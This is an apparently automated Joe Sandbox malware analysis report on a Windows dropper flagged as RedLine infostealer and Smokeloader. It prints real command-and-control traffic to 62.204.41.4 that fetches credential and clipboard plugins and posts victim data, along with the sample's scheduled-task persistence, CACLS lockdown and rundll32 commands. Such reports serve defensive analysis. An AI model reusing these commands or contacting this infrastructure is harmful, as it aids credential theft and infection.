00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View

ASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI

Source: Joe Sandbox View

IP Address: 62.204.41.4 62.204.41.4

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Code function: 11_2_01367F00 CreateMutexW,GetLastError,SetCurrentDirectoryA,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,

Source: global traffic	HTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
Source: global traffic	HTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 19:00:50 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4

Source: unknown

HTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1

Source: xriv.exe, 0000000B.00000002.318710664.000000000165A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.afCf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.3.afCf.exe.6b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.afCf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.afCf.exe.660e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB3BA2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB5C9E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00943BA2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00945C9E
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00418244
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00401650
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00418788
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0066786D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_006618B7
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_006789EF
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_006631F0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00663187
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00662B17
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_006784AB
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00662DF7
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0066DE78
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00668EC7
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00667EA6
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0067A725
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00678F33
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00666F07
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_006677D9
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00857000
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_01388530
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_0138754D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_01366F40

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.afCf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.3.afCf.exe.6b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.afCf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.afCf.exe.660e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00941F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: String function: 01375E20 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: String function: 01377CE0 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: String function: 0066E43F appears 44 times

Source: file.exe	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 380422 bytes, 2 files, at 0x2c +A "bfCg.exe" +A "xriv.exe", ID 1563, number 1, 18 datablocks, 0x1503 compression
Source: bfCg.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 189540 bytes, 2 files, at 0x2c +A "afCf.exe" +A "nika.exe", ID 1523, number 1, 9 datablocks, 0x1503 compression

Source: file.exe, 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\afCf.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@38/14@0/1

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EB3FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

Code function: 6_2_00007FFC9D7D1A1D ControlService,ChangeServiceConfigA,

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EB4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,

Source: file.exe	ReversingLabs: Detection: 66%
Source: file.exe	Virustotal: Detection: 48%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y\|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y\|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00941F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EB597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5176:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_01

Source: C:\Users\user\Desktop\file.exe	Command line argument: Kernel32.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Command line argument: Kernel32.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Command line argument: 08A

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wextract.pdb source: file.exe, bfCg.exe.0.dr
